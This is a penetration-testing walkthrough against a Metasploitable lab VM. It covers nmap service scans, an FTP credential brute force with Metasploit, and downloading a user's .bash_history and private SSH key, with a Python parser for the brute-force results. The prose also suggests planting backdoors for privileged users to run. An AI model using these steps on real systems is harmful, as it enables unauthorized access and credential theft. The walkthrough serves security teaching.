=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 727 exploits - 372 auxiliary - 78 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13625 updated today (2011.08.24)
msf >
We start by identifying any live hosts with an nmap ping scan.
msf > nmap -sP 172.72.5.2-254
[*] exec: nmap -sP 172.72.5.2-254
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:04 IST
Nmap scan report for 172.72.5.143
Host is up (0.00042s latency).
MAC Address: 00:0C:29:8D:8D:A4 (VMware)
Nmap scan report for 172.72.5.254
Host is up (0.00019s latency).
MAC Address: 00:50:56:FD:82:EC (VMware)
Nmap done: 253 IP addresses (2 hosts up) scanned in 5.06 seconds
msf >
We find our target Metasploitable system at IP 172.72.5.143. Let's gather information on the services running on the target.
-sV -> probe open ports to identify service / version info
-sT -> TCP connect scan: performs a full 3-way TCP handshake. Can take time but is very reliable.
msf > nmap -sV -sT 172.72.5.143
[*] exec: nmap -sV -sT 172.72.5.143
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:07 IST
Nmap scan report for 172.72.5.143
Host is up (0.00043s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux
Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds
We will explore these services one by one and see what we can find with each.
1. 21/tcp open ftp ProFTPD 1.3.1
Metasploit auxiliary module -> auxiliary/scanner/ftp/ftp_login
set PASS_FILE /opt/metasploit_open/msf3/data/wordlists/unix_passwords.txt
set USER_FILE /opt/metasploit_open/msf3/data/wordlists/unix_users.txt
setg RHOSTS 172.72.5.143
run
[+] 172.72.5.143:21 - Successful FTP login for 'postgres':'postgres'
[*] 172.72.5.143:21 - User 'postgres' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'service':'service'
[*] 172.72.5.143:21 - User 'service' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'user':'user'
[*] 172.72.5.143:21 - User 'user' has READ/WRITE access
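As an added example (not code from the original post), a small Python parser that turns the ftp_login output above into structured findings and flags joe accounts (password identical to the user name) and accounts with write access. The 'backup' lines in the sample are constructed for contrast; the other lines are the module output shown above.

```python
import re
from dataclasses import dataclass

# The two line types ftp_login prints for a hit (formats taken from the output above).
LOGIN_RE = re.compile(r"^\[\+\] (?P<host>[\d.]+):(?P<port>\d+) - Successful FTP login for '(?P<user>[^']*)':'(?P<password>[^']*)'$")
ACCESS_RE = re.compile(r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) - User '(?P<user>[^']*)' has (?P<access>[A-Z/]+) access$")

@dataclass
class Finding:
    host: str
    port: int
    user: str
    password: str
    access: str = "UNKNOWN"

    @property
    def joe_account(self) -> bool:
        # A "joe account": the password is the user name itself.
        return self.user == self.password

def parse_ftp_login(output: str) -> list:
    """Return one Finding per successful login, with its access level attached."""
    findings = {}
    for line in output.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            key = (m["host"], int(m["port"]), m["user"])
            findings[key] = Finding(m["host"], int(m["port"]), m["user"], m["password"])
            continue
        m = ACCESS_RE.match(line)
        if m and (m["host"], int(m["port"]), m["user"]) in findings:
            findings[(m["host"], int(m["port"]), m["user"])].access = m["access"]
    return list(findings.values())

def summarize(findings) -> dict:
    """Group findings the way a report would: joe accounts and writable accounts."""
    return {
        "joe_accounts": sorted(f.user for f in findings if f.joe_account),
        "writable": sorted(f.user for f in findings if "WRITE" in f.access),
    }

# The three hits from the post plus one constructed non-joe hit ('backup') for contrast.
SAMPLE_OUTPUT = """\
[+] 172.72.5.143:21 - Successful FTP login for 'postgres':'postgres'
[*] 172.72.5.143:21 - User 'postgres' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'service':'service'
[*] 172.72.5.143:21 - User 'service' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'user':'user'
[*] 172.72.5.143:21 - User 'user' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'backup':'S3cret-example'
[*] 172.72.5.143:21 - User 'backup' has READ access
"""
```

Running `summarize(parse_ftp_login(SAMPLE_OUTPUT))` gives the three joe accounts from the post and leaves the constructed 'backup' account out of both lists.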
We have 3 FTP login credentials now. Let's use these IDs to log in to the target.
root@victor:tmp# ftp 172.72.5.143
Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): user
331 Password required for user
Password:
230 User user logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 .
-rw------- 1 user user 165 May 7 2010 .bash_history
drwx------ 2 user user 4096 May 7 2010 .ssh
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 user user 220 Mar 31 2010 .bash_logout
-rw-r--r-- 1 user user 2928 Mar 31 2010 .bashrc
-rw-r--r-- 1 user user 586 Mar 31 2010 .profile
226 Transfer complete
.bash_history keeps a history of commands a user has run. Many a time in pentests, I've found useful info on targets, such as user IDs, passwords, confidential file names, locations, important server names, shared resources etc. in this little file.
I will download this file.
Remember that information gathering is a continuous, ongoing phase during a penetration test. You will build upon the collected information to leverage access into the target environment.
There is also a .ssh directory. Checking it reveals the public and private SSH keys of the 'user' account.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful
150 Opening BINARY mode data connection for .bash_history (165 bytes)
226 Transfer complete
165 bytes received in 0.00 secs (41.6 kB/s)
In a pentest, you may come across a scenario where SSH is permitted for device / server administration but passwords are not used. Instead, public key authentication is configured. This means that if you can obtain the SSH keys of a [ privileged ] user, you can gain direct access to the resources without needing to know the login password. Also, in certain environments, access and security are tied to trusts. Once you can impersonate a 'trusted' / authorized user, gaining access to other juicy resources is a piece of cake.
We go into the .ssh directory and see the key pair. The private key is what we will need. Download it.
ftp> cd .ssh
250 CWD command successful
ftp> ls -lta
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 ..
drwx------ 2 user user 4096 May 7 2010 .
-rw------- 1 user user 668 May 7 2010 id_dsa
-rw-r--r-- 1 user user 609 May 7 2010 id_dsa.pub
226 Transfer complete
ftp> get id_dsa
local: id_dsa remote: id_dsa
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa (668 bytes)
226 Transfer complete
668 bytes received in 0.00 secs (327.8 kB/s)
ftp> get id_dsa.pub
local: id_dsa.pub remote: id_dsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa.pub (609 bytes)
226 Transfer complete
609 bytes received in 0.00 secs (379.8 kB/s)
ftp> bye
From the .bash_history file, a new user 'msfadmin' seems to be present on the target box.
root@victor:tmp# cat bash_history-user
ssh-keygen -t dsa
ls
cd .ssh
ls
sudo -s
cd /home/user
ls
ls .ss
ls .ssj
clear
ls .ssh
sudo cat ~/.ssh/id_dsa.pub >> /home/msfadmin/.ssh/authorized_keys
sudo -s
exit
After brute forcing, it is confirmed that, just like the previous 3 users, msfadmin is a joe account, meaning that the password is the same as the user ID -> msfadmin. FTP login using msfadmin is successful.
ftp 172.72.5.143
Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw------- 1 msfadmin msfadmin 806 May 18 2010 .bash_history
drwxr-xr-x 5 msfadmin msfadmin 4096 May 18 2010 .
drwx------ 2 msfadmin msfadmin 4096 May 18 2010 .ssh
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 .sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 98 Apr 28 2010 .lesshst
drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 28 2010 vulnerable
drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile
226 Transfer complete
The user has read/write privileges via the FTP service. Even though these are non-root accounts with RW privileges only in their home directories, we have gained a foothold on the target. The same applies to other system / network services such as Samba [ file sharing ] or SSH [ remote access ]. Using these accounts, it is now possible for us to explore the file system, configuration(s), setup, and any specific software / applications that are installed and may be vulnerable. Also a good idea is to upload backdoor / malware / trojan / privilege escalation exploit(s) to the server. The expectation is to wait for some user, usually root or a root-privileged user, to access these malicious executables and run them. Once the executable runs, depending upon its function, a variety of actions can be performed. Actions include, but are not limited to, gaining a shell, executing commands, sniffing sensitive data off the wire and sending the logs to the attacker, enumerating other systems in the network environment for further exploitation, and many more.
In a pentest, however, always document any changes you've made to the file system and remember to clean up executables, configuration changes etc. before you sign off for the day. Normally, any changes made by the pentester and the associated risk must be discussed with the customer and agreed upon in the Terms of Engagement.
Next up --> Exploring SSH service